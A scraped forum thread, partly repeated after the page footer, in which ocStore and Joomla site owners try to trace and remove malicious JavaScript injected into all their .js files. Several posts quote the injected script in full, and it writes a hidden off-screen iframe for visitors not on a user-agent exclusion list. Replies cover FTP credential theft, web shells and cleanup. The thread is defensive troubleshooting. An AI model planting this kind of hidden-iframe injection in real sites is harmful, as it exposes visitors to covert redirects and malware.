colaweb Опубліковано: 13 жовтня 2013 Share Опубліковано: 13 жовтня 2013 Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/ вот этот код: //beleiad9 (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK'; blackList = blackList.split('|'); var blackUA = false; for (var i in blackList) { if (stripos(navigator.userAgent, blackList[i])!==false) { blackUA = true; break; } } return blackUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!zzz_check_ua()) { var cookie = getCookie('nirajo819fyau82'); if (cookie == undefined) { setCookie('nirajo819fyau82', true, 86400); document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>'); } }; })(); //kolamne817 Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут. магазин http://colaweb.ru/honey/ Надіслати Поділитися на інших сайтах More sharing options... Strelez Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 На другой cms была такая проблема - во ВСЕ js-файлы (в самый конец) добавлялся, скажем так, некий код (не обязательно как у вас). Выяснилось: дыра FTP (а потому не храните пароли в клиентах). Лечение: либо чистка всех js-файлов, либо их замена + ОБЯЗАТЕЛЬНАЯ смена FTP-доступов (логин - пароль). Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/ вот этот код: Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут. магазин http://colaweb.ru/honey/ на вашем аккаунте случайно нет сайтов на джумле или дле? Если есть, то ищите дыры там Надіслати Поділитися на інших сайтах More sharing options... colaweb Опубліковано: 14 жовтня 2013 Автор Share Опубліковано: 14 жовтня 2013 Как оказалось, вредоносный код во всех файлах *.js не только в ocStore, но и в других cms. Надіслати Поділитися на інших сайтах More sharing options... Strelez Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 на вашем аккаунте случайно нет сайтов на джумле или дле? Если есть, то ищите дыры там Не факт. Описанная выше проблема у меня произошла на open slaed. Причину я указал. Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 Не факт. Описанная выше проблема у меня произошла на open slaed. Причину я указал. я бы мог конечно назвать и другие CMS , но боюсь , что не хватит места на форуме.. просто привел пример.. :-) Надіслати Поділитися на інших сайтах More sharing options... Strelez Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 Так ведь дело-то не в cms, а в способе и пути проникновения вредоносного кода, ну и "чистоте" своего компьютера, конечно же :wink: Надіслати Поділитися на інших сайтах More sharing options... colaweb Опубліковано: 14 жовтня 2013 Автор Share Опубліковано: 14 жовтня 2013 1. Почистил все файлы *.js 2. Поменял все пароли "Дырку" та и не нашел, посмотрю что завтра будет. Надіслати Поділитися на інших сайтах More sharing options... colaweb Опубліковано: 14 жовтня 2013 Автор Share Опубліковано: 14 жовтня 2013 1. Почистил все файлы *.js 2. Поменял все пароли "Дырку" та и не нашел, посмотрю что завтра будет. Не помогло. Опять во все *.js дописался вначале вредоносный код В файле ошибок появились записи: 2013-10-14 20:18:51 - PHP Warning: fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99 2013-10-14 20:18:51 - PHP Warning: fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103 2013-10-14 20:18:51 - PHP Warning: sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106 2013-10-14 20:44:55 - PHP Warning: fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99 2013-10-14 20:44:55 - PHP Warning: fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103 2013-10-14 20:44:55 - PHP Warning: sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106 2013-10-14 20:50:12 - PHP Warning: fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99 2013-10-14 20:50:12 - PHP Warning: fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103 2013-10-14 20:50:12 - PHP Warning: sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106 Что делать? Надіслати Поділитися на інших сайтах More sharing options... Thirdian Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 Имхо, ищите шелл. Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 вот тут colaweb/public_html/honey/download/ посмотрите... лишнего ничего нет в папке? в крайнем случае обратитесь к хостеру... нормальный хостер подскажет от куда ноги растут Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... haykoar Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 (змінено) Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/ вот этот код: //beleiad9 (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK'; blackList = blackList.split('|'); var blackUA = false; for (var i in blackList) { if (stripos(navigator.userAgent, blackList[i])!==false) { blackUA = true; break; } } return blackUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!zzz_check_ua()) { var cookie = getCookie('nirajo819fyau82'); if (cookie == undefined) { setCookie('nirajo819fyau82', true, 86400); document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>'); } }; })(); //kolamne817 Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут. магазин http://colaweb.ru/honey/ У меня тоже была такая проблема. В аккаунте 8 сайтов, и все js файлы были заражены этим кодом. В сайтах все, что было связано с jquery, перестало работать. Разумеется, что удаление вреданосного кода бесполезно, потому что через 10 мин. код самостоятельно восстановливается. Я тоже долго искал дыру во всех сайтах аккаунта и нашел в папке "Images" сайта erevan-online.ru. Там в файле .htaccess я обнаружил обсалютный путь к файлу пароля моего аккаунта. Я заменил этот код на вот такой: <Files ~ "\.(php|cgi|pl|php3|php4|php5|php6|phps|phtml|shtml|py)$"> Deny from all </Files> Order allow,deny Deny from all Потом сменил пароль FTP аккаунта. А что произашло после этого, я не понял... В js файлах всех сайтов тот код, который я цитировал больше не было, они исчезали самостоятельно. Кто-то может обяснить как это произошло? Спасибо всем Змінено 23 жовтня 2013 користувачем afwollis unlinked Надіслати Поділитися на інших сайтах More sharing options... Zeppelin Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 для поиска заразы на хостинге хорошо подходит такой инструмент как AI-Bolit — это уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге Надіслати Поділитися на інших сайтах More sharing options... Baco Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина. Надіслати Поділитися на інших сайтах More sharing options... colaweb Опубліковано: 23 жовтня 2013 Автор Share Опубліковано: 23 жовтня 2013 Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина. Шеллы сидели в Joomle. Почистил все файлы .php где был код с eval(.. Пока все тихо, ищу "дырку" . Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 Шеллы сидели в Joomle. Почистил все файлы .php где был код с eval(.. Пока все тихо, ищу "дырку" . вот об этом я вам и писал ранее... а дырку ищите в правах доступа к файлам и папкам... и сделайте дополнительную авторизацию для админки на уровне сервера... Надіслати Поділитися на інших сайтах More sharing options... Doktorsaitov Опубліковано: 29 жовтня 2013 Share Опубліковано: 29 жовтня 2013 ТС скрипт который вы использовали ищет самое популярное из вредоносных кодов (говорю по опыту), проблема в следующий раз просто усложниться. Постарайтесь глазами пройтись по коду вашего сайта. Так же хотел обратить внимание, что и хостинг играет большую роль, точнее его натсройка, как выше говорили вам указать права на папки и файлы - это может не помочь, если не будут правильно выставлены настройки сервера их просто будут менять на те, котоыре нужны злоумшлинику. Надіслати Поділитися на інших сайтах More sharing options... 1 month later... Pavel555 Опубліковано: 23 грудня 2013 Share Опубліковано: 23 грудня 2013 Тоже попалась эта зараза. Действовал так: удалил вредоносный код из всех .js в access_log поискал все, что содержит "js", среди результатов внимание привлекли запросы POST с именем файла 6a442.php поискал по всем файлам на сервере по содержимому вышеуказанного php, поиск дал еще 95 файлов с таким же содержимым в разных папках joomla удалил все найденные php Надіслати Поділитися на інших сайтах More sharing options... 2 months later... Pavel555 Опубліковано: 23 березня 2014 Share Опубліковано: 23 березня 2014 В общем, вышеуказонный метод помогает, но ненадолго. Через неделю-другую вредоносный код появляется снова. Зараженные файлы лечу снова, но видимо вирус где-то остается недочищенным. У кого какие идеи, как дочистить супостата? Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... elitesmart Опубліковано: 6 квітня 2014 Share Опубліковано: 6 квітня 2014 А разве оригинала у вас не осталось? База то не тронута, а сайт перезалейте, максимально оригинальными данными. Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 6 квітня 2014 Share Опубліковано: 6 квітня 2014 Идей много, вплоть до анализа логов доступа. Вам нужно лечить? или заниматься самолечением? Надіслати Поділитися на інших сайтах More sharing options... 1 month later... andreyvebuiskii Опубліковано: 19 травня 2014 Share Опубліковано: 19 травня 2014 Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/ вот этот код: //beleiad9 (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK'; blackList = blackList.split('|'); var blackUA = false; for (var i in blackList) { if (stripos(navigator.userAgent, blackList[i])!==false) { blackUA = true; break; } } return blackUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!zzz_check_ua()) { var cookie = getCookie('nirajo819fyau82'); if (cookie == undefined) { setCookie('nirajo819fyau82', true, 86400); document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>'); } }; })(); //kolamne817 Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут. магазин http://colaweb.ru/honey/ Может это поможет? Вирусдай (писал обзор тут). Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки [Решено? {joomla}] Взлом магазина *.js Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
Strelez Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 На другой cms была такая проблема - во ВСЕ js-файлы (в самый конец) добавлялся, скажем так, некий код (не обязательно как у вас). Выяснилось: дыра FTP (а потому не храните пароли в клиентах). Лечение: либо чистка всех js-файлов, либо их замена + ОБЯЗАТЕЛЬНАЯ смена FTP-доступов (логин - пароль). Надіслати Поділитися на інших сайтах More sharing options...
Гість Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/ вот этот код: Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут. магазин http://colaweb.ru/honey/ на вашем аккаунте случайно нет сайтов на джумле или дле? Если есть, то ищите дыры там Надіслати Поділитися на інших сайтах More sharing options...
colaweb Опубліковано: 14 жовтня 2013 Автор Share Опубліковано: 14 жовтня 2013 Как оказалось, вредоносный код во всех файлах *.js не только в ocStore, но и в других cms. Надіслати Поділитися на інших сайтах More sharing options... Strelez Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 на вашем аккаунте случайно нет сайтов на джумле или дле? Если есть, то ищите дыры там Не факт. Описанная выше проблема у меня произошла на open slaed. Причину я указал. Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 Не факт. Описанная выше проблема у меня произошла на open slaed. Причину я указал. я бы мог конечно назвать и другие CMS , но боюсь , что не хватит места на форуме.. просто привел пример.. :-) Надіслати Поділитися на інших сайтах More sharing options... Strelez Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 Так ведь дело-то не в cms, а в способе и пути проникновения вредоносного кода, ну и "чистоте" своего компьютера, конечно же :wink: Надіслати Поділитися на інших сайтах More sharing options... colaweb Опубліковано: 14 жовтня 2013 Автор Share Опубліковано: 14 жовтня 2013 1. Почистил все файлы *.js 2. Поменял все пароли "Дырку" та и не нашел, посмотрю что завтра будет. Надіслати Поділитися на інших сайтах More sharing options... colaweb Опубліковано: 14 жовтня 2013 Автор Share Опубліковано: 14 жовтня 2013 1. Почистил все файлы *.js 2. Поменял все пароли "Дырку" та и не нашел, посмотрю что завтра будет. Не помогло. Опять во все *.js дописался вначале вредоносный код В файле ошибок появились записи: 2013-10-14 20:18:51 - PHP Warning: fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99 2013-10-14 20:18:51 - PHP Warning: fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103 2013-10-14 20:18:51 - PHP Warning: sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106 2013-10-14 20:44:55 - PHP Warning: fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99 2013-10-14 20:44:55 - PHP Warning: fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103 2013-10-14 20:44:55 - PHP Warning: sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106 2013-10-14 20:50:12 - PHP Warning: fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99 2013-10-14 20:50:12 - PHP Warning: fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103 2013-10-14 20:50:12 - PHP Warning: sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106 Что делать? Надіслати Поділитися на інших сайтах More sharing options... Thirdian Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 Имхо, ищите шелл. Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 вот тут colaweb/public_html/honey/download/ посмотрите... лишнего ничего нет в папке? в крайнем случае обратитесь к хостеру... нормальный хостер подскажет от куда ноги растут Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... haykoar Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 (змінено) Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/ вот этот код: //beleiad9 (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK'; blackList = blackList.split('|'); var blackUA = false; for (var i in blackList) { if (stripos(navigator.userAgent, blackList[i])!==false) { blackUA = true; break; } } return blackUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!zzz_check_ua()) { var cookie = getCookie('nirajo819fyau82'); if (cookie == undefined) { setCookie('nirajo819fyau82', true, 86400); document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>'); } }; })(); //kolamne817 Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут. магазин http://colaweb.ru/honey/ У меня тоже была такая проблема. В аккаунте 8 сайтов, и все js файлы были заражены этим кодом. В сайтах все, что было связано с jquery, перестало работать. Разумеется, что удаление вреданосного кода бесполезно, потому что через 10 мин. код самостоятельно восстановливается. Я тоже долго искал дыру во всех сайтах аккаунта и нашел в папке "Images" сайта erevan-online.ru. Там в файле .htaccess я обнаружил обсалютный путь к файлу пароля моего аккаунта. Я заменил этот код на вот такой: <Files ~ "\.(php|cgi|pl|php3|php4|php5|php6|phps|phtml|shtml|py)$"> Deny from all </Files> Order allow,deny Deny from all Потом сменил пароль FTP аккаунта. А что произашло после этого, я не понял... В js файлах всех сайтов тот код, который я цитировал больше не было, они исчезали самостоятельно. Кто-то может обяснить как это произошло? Спасибо всем Змінено 23 жовтня 2013 користувачем afwollis unlinked Надіслати Поділитися на інших сайтах More sharing options... Zeppelin Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 для поиска заразы на хостинге хорошо подходит такой инструмент как AI-Bolit — это уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге Надіслати Поділитися на інших сайтах More sharing options... Baco Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина. Надіслати Поділитися на інших сайтах More sharing options... colaweb Опубліковано: 23 жовтня 2013 Автор Share Опубліковано: 23 жовтня 2013 Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина. Шеллы сидели в Joomle. Почистил все файлы .php где был код с eval(.. Пока все тихо, ищу "дырку" . Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 Шеллы сидели в Joomle. Почистил все файлы .php где был код с eval(.. Пока все тихо, ищу "дырку" . вот об этом я вам и писал ранее... а дырку ищите в правах доступа к файлам и папкам... и сделайте дополнительную авторизацию для админки на уровне сервера... Надіслати Поділитися на інших сайтах More sharing options... Doktorsaitov Опубліковано: 29 жовтня 2013 Share Опубліковано: 29 жовтня 2013 ТС скрипт который вы использовали ищет самое популярное из вредоносных кодов (говорю по опыту), проблема в следующий раз просто усложниться. Постарайтесь глазами пройтись по коду вашего сайта. Так же хотел обратить внимание, что и хостинг играет большую роль, точнее его натсройка, как выше говорили вам указать права на папки и файлы - это может не помочь, если не будут правильно выставлены настройки сервера их просто будут менять на те, котоыре нужны злоумшлинику. Надіслати Поділитися на інших сайтах More sharing options... 1 month later... Pavel555 Опубліковано: 23 грудня 2013 Share Опубліковано: 23 грудня 2013 Тоже попалась эта зараза. Действовал так: удалил вредоносный код из всех .js в access_log поискал все, что содержит "js", среди результатов внимание привлекли запросы POST с именем файла 6a442.php поискал по всем файлам на сервере по содержимому вышеуказанного php, поиск дал еще 95 файлов с таким же содержимым в разных папках joomla удалил все найденные php Надіслати Поділитися на інших сайтах More sharing options... 2 months later... Pavel555 Опубліковано: 23 березня 2014 Share Опубліковано: 23 березня 2014 В общем, вышеуказонный метод помогает, но ненадолго. Через неделю-другую вредоносный код появляется снова. Зараженные файлы лечу снова, но видимо вирус где-то остается недочищенным. У кого какие идеи, как дочистить супостата? Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... elitesmart Опубліковано: 6 квітня 2014 Share Опубліковано: 6 квітня 2014 А разве оригинала у вас не осталось? База то не тронута, а сайт перезалейте, максимально оригинальными данными. Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 6 квітня 2014 Share Опубліковано: 6 квітня 2014 Идей много, вплоть до анализа логов доступа. Вам нужно лечить? или заниматься самолечением? Надіслати Поділитися на інших сайтах More sharing options... 1 month later... andreyvebuiskii Опубліковано: 19 травня 2014 Share Опубліковано: 19 травня 2014 Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/ вот этот код: //beleiad9 (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK'; blackList = blackList.split('|'); var blackUA = false; for (var i in blackList) { if (stripos(navigator.userAgent, blackList[i])!==false) { blackUA = true; break; } } return blackUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!zzz_check_ua()) { var cookie = getCookie('nirajo819fyau82'); if (cookie == undefined) { setCookie('nirajo819fyau82', true, 86400); document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>'); } }; })(); //kolamne817 Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут. магазин http://colaweb.ru/honey/ Может это поможет? Вирусдай (писал обзор тут). Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки [Решено? {joomla}] Взлом магазина *.js Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності 